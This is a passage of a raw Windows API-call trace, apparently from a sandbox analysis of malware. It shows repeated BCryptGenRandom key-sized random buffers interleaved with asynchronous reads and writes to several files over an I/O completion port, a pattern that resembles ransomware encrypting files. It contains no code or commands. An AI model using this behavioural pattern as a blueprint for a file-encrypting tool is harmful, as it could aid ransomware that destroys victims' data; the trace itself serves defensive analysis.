[0195.255] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.255] free (_Block=0x3e305b8) [0195.255] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.255] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.255] free (_Block=0x1fa91d0) [0195.255] free (_Block=0x1fa2ed8) [0195.255] free (_Block=0x1fa90b8) [0195.255] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.260] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x37d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.263] CloseHandle (hObject=0x308) returned 1 [0195.264] free (_Block=0x1ff1e60) [0195.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.272] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.393] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x5c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.403] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1fb84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0195.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.440] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0195.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.469] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.470] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.470] free (_Block=0x3e305b8) [0195.470] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.470] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.470] free (_Block=0x1fa91d0) [0195.470] free (_Block=0x1fa2ed8) [0195.470] free (_Block=0x1fa90b8) [0195.470] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.472] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.483] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1b780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.499] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.499] free (_Block=0x3e305b8) [0195.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.499] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.499] free (_Block=0x1fa91d0) [0195.499] free (_Block=0x1fa2ed8) [0195.499] free (_Block=0x1fa90b8) [0195.499] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.514] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.515] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0195.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.541] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xeee, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.542] CloseHandle (hObject=0x170) returned 1 [0195.542] free (_Block=0x1ff1e60) [0195.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.564] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.564] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.564] free (_Block=0x3e305b8) [0195.564] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.564] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.564] free (_Block=0x1fa91d0) [0195.564] free (_Block=0x1fa2ed8) [0195.564] free (_Block=0x1fa90b8) [0195.564] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.572] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.574] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.574] free (_Block=0x3e305b8) [0195.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.574] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.574] free (_Block=0x1fa91d0) [0195.574] free (_Block=0x1fa2ed8) [0195.574] free (_Block=0x1fa90b8) [0195.574] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.600] CloseHandle (hObject=0x170) returned 1 [0195.601] free (_Block=0x3df0008) [0195.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.612] CloseHandle (hObject=0x2a8) returned 1 [0195.612] free (_Block=0x1ff1e60) [0195.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.623] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe16, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0195.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.634] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xefb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.659] CloseHandle (hObject=0x170) returned 1 [0195.659] free (_Block=0x3df0008) [0195.659] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.673] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.677] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.678] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0195.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.686] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdc6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.687] CloseHandle (hObject=0x170) returned 1 [0195.687] free (_Block=0x3df0008) [0195.687] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.698] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.698] free (_Block=0x3e305b8) [0195.698] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.698] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.698] free (_Block=0x1fa91d0) [0195.698] free (_Block=0x1fa2ed8) [0195.698] free (_Block=0x1fa90b8) [0195.698] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.699] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.711] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe48, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.712] CloseHandle (hObject=0x170) returned 1 [0195.712] free (_Block=0x3df0008) [0195.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.722] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.722] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.722] free (_Block=0x3e305b8) [0195.722] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.722] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.723] free (_Block=0x1fa91d0) [0195.723] free (_Block=0x1fa2ed8) [0195.723] free (_Block=0x1fa90b8) [0195.723] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.723] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.724] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.735] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe16, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.736] CloseHandle (hObject=0x170) returned 1 [0195.736] free (_Block=0x3df0008) [0195.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.746] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.746] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.746] free (_Block=0x3e305b8) [0195.746] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.746] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.747] free 